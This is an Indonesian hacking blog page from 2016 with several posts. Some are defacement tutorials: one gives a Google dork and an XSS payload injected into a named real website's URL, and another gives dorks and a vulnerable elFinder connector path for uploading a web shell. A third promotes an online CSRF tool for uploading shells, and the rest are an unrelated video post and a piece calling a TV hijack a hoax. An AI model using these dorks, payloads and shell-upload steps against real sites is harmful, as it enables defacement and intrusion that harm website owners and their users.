Rabu, 14 Desember 2016

Cara Deface Website Dengan XSS (Cross Site Scripting)


HumarTutor - Cara Deface Website Dengan XSS (Cross Site Scripting).


Apa itu XSS?

XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.

Ini gabisa buat dimirrorin, yang suka ngebut mirror LOL.

Langkah :

1. Dorking,

Dork : inurl:"/showcatrows.php?CategoryID="

2. Pilih salah satu web yang mau di xss

sad
indocyberarmy

Tag : Cara Bypass, Bypass Admin, Bypass Shell, WordPress download, Instal WordPress, WordPress.org Hacked, WordPress Vuln Theme, Plugins All In One Security, Cara Hack Wordpress, Defacer Indonesia, Indonesian Defacer, Hacked, Government subdomain hacked, Hacker Indonesia, Cara Upload Shell, Shell c99, Shell b374k, Hacker (2016), Download film hacker, Cara Carding. CSRF Online, Apa itu CSRF, Cara Hack Facebook, CSRF Exploiter Online, PoisonSquad, Hacked by, Jim Geovedi, Jquery File Upload, Formcraft, ContactForm, Hackeado Por, X.X, Owned by, Pwnd by.


3. Disini saya mencoba http://www.examsolutions.co.uk/maths-revision-papers/showcatrows.php?CategoryID=13

xss
indocyberarmy

4. Jika sudah masuk ke dalam web tersebut, untuk mencobanya adalah tambahkan " dan > setelah angka, atau pada akhir url. Dan tambahkan kode html deface kita semua.

Contoh : http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13"><h1><marquee>Hacked by X.X PoisonSquad</marquee></h1>


Dan lihat di web wkwk

Kalian juga bisa menambahkan kode html yang lain

Contoh :

- <font color="red" size="20"> Hacked by X.X ! PoisonSquad </font>
- <i><b><u>Hacked by X.X ! PoisonSquad</u></b></i>
- dll






Title :

Cara Deface Website Dengan XSS (Cross Site Scripting)

Reviewed by

Humar

On

13.35.00

Rating :

5

Rabu, 07 Desember 2016

New CSRF Exploiter Online

online

HumarTutor - New CSRF Exploiter Online. 

Kenapa New?
Karena yang kemaren ERROR


Apa itu csrf? yaelah masa gatau. Google aja 😃
Pasti yang sering deface kurang lebih butuh CSRF, contohnya : Jquery File Upload, CFG Contact Form dll.

Kelebihan :

1. Jadi kalian gausah ribet - ribet ganta - ganti di Notepad, kan bikin males

2. Tinggal Copas Link & Postfile , trus Upload Shell selesai :D

Tag : CSRF Online, Apa itu CSRF, Cara Hack Facebook, CSRF Exploiter Online, PoisonSquad, Hacked by, Jim Geovedi, Jquery File Upload, Formcraft, ContactForm, Hackeado Por, X.X, Owned by, Pwnd by.

Bingung Postfile itu apa ?

Lihat sc csrf mu :

sda
Postfile diatas "Filedata", Masukinnya tanpa tnd kutip


aa
Postfile diatas "files[]", Masukinnya tanpa tnd kutip

Langsung aja kunjungi :

Title :

New CSRF Exploiter Online

Reviewed by

Humar

On

15.33.00

Rating :

5

Cara Deface Elfinder Web Host Bug

finder

HumarTutor - Cara Deface Elfinder Web Host Bug.

Ini merupakan cara mudah untuk deface. Kenapa? Karena kita hanya perlu exploit dan sumbit ke uploadernya dan sudah

Berbeda dengan elfinder biasa, karena ini elfinder web host bug

Web host bug diantaranya: 

Syarat :

1. sc deface or shell 
2. Uploader. Untuk uploader download sc dibawah

3. Dork : 
- site:id.ai
- site:nazuka.net
- site:ye.vc

Langkah :

1. Dorking dulu

2. Kalo udah nemu exploit dengan  /_file-manager/php/connector.php 

ne


Vuln : {"error":["errUnknownCmd"]}

Tag : Cara Bypass, Bypass Admin, Bypass Shell, WordPress download, Instal WordPress, WordPress.org Hacked, WordPress Vuln Theme, Plugins All In One Security, Cara Hack Wordpress, Defacer Indonesia, Indonesian Defacer, Hacked, Government subdomain hacked, Hacker Indonesia, Cara Upload Shell, Shell c99, Shell b374k, Hacker (2016), Download film hacker, Cara Carding,

3. Pasang uploader ke web, masukkan site beserta exploit nya

uploaded


contoh : site.com /_file-manager/php/connector.php 

4. Dan kalo sudah terupload nanti seperti gambar diatas.

5. Tempat shell ? site.com/shell.php

Download Uploader :


Video ? :
DISINI atau DISINI

Title :

Cara Deface Elfinder Web Host Bug

Reviewed by

Humar

On

15.17.00

Rating :

5

Hardest Name in Africa

Name


HumarTutor - Hardest Name in Africa ! LOL

Ya ini adalah video dimana ada seseorang yang ingin menanyakan nama kepada orang africa ini, namun orang africa ini menjawabnya dengan kata kata yang lucu 

Hardest Name in Africa :


Dalam video ini si penanya kesal karena namanya terlalu panjang dan sulit dihafalkan,

Hingga dalam video ini si penanya sangat kesal dan akhirnya menangis

Video :

Berikut saya akan menampilkan video Hardest Name in Africa 




Atau kalian bisa Download di :
Disini atau Disini atau Disini

Title :

Hardest Name in Africa

Reviewed by

Humar

On

14.29.00

Rating :

5

Apa Benar Rumah Uya Trans 7 Disabotase Hacker? HOAX OR NOT


NOT
HOAX OR NOT

HumarTutor - Apa Benar Rumah Uya Trans 7 Disabotase Hacker? HOAX OR NOT. 

Kemarin, 6 Desember 2016. Ketika acara Rumah Uya sedang Live, Tiba tiba siaran itu tertutup oleh sesorang berjaket hitam dan mengenakan penutup wajah.

Benarkah?

Awalnya pada info live hunian uya itu, satu orang perempuan yg adalah salah tunggal pemakai di hunian uya terkena telepon bersumber seorang. Host uya kuya memengaruhi perempuan terkandung menerimanya dan di loadspeaker supaya nada si penelepon terdengar. Terdengar nada sipenelepon itu memerintahkan perempuan itu supaya ke luar mulai sejak studio trans7 sambil menyebut-nyebut keutamaan uya kuya. Uya kuya dulu membawa telephone seluler si perempuan itu dan sipenelepon itu kembali mengemukakan ke luar atau aku bajak!!!". dulu telepon putus.

Host uya kuya lagi samar bersama kata-kata sipenelepon tadi. tak tua selanjutnya lampu studio hunian uya nampak kedip-kedip, nyala-mati. Tiba-tiba.. Blegg..siaran trans7 live hunian uya sembunyisembunyi dan unjuk gigi video seorang berjaket hitam dgn penghabisan roman sambil berbicara kembali " ke luar dan pulang permulaan anda kini!.

Video dgn tenggat sekian banyak detik itu semula darah memerangahkan uya kuya beserta seluruhnya crew. Mereka kalang kabut menguber pelakunya yg diduga kaya pada pemancar trans7. Dan masalah itu tambah terulang pun dgn menganjurkan video sipelaku sambil terus menugasi siwanita itu ke luar berasal studio trans7.

Perlu dipercaya jika manusia yg bisa bertingkah seperti itu dgn merampas warta halte televisi yakni tak wong khilaf. Mereka memiliki kemampuan husus pada sektor seperti ini. Atau sanggup lagi dinamakan hacker. hingga naskah ini dibuat, program live hunian uya semula berjalan.

HOAX OR NOT?

Uya
Dikutp dari Rumah Uya


Dikutip dari Twitter Rumah Uya@RumahUya_Trans7 "Wah siapakah pria ini tweeps? Kok Dora jadi ketakutan gitu ya?" dan "Mungkinkah pria yg membajak itu tadi Andre tweeps? Ikutin terus yaa"
  1. Dipikir pikir kalo emang disabotase beneran, kok masih sempet twitter-an , dan tweet nya ganyambung kalo emang disabotase.
  2. Buat yang bilang itu asli karena LIVE, Dipikir - pikir dulu gan. Emangnya kalo mau LIVE ga ada arahan dari kreatif acara, ga ada skenario, ga ada rencana gitu?? wkwkwkw

Jadi kita simpulkan kalo ini HOAX dan hanya mencari Rating,

VIDEO SABOTASE :

Buat yang penasaran dan ga sempet liat, bisa liat video nya yg gmt dibawah :


DISINI atau DISINI atau DISINI

Title :

Apa Benar Rumah Uya Trans 7 Disabotase Hacker? HOAX OR NOT

Reviewed by

Humar

On

14.14.00

Rating :

5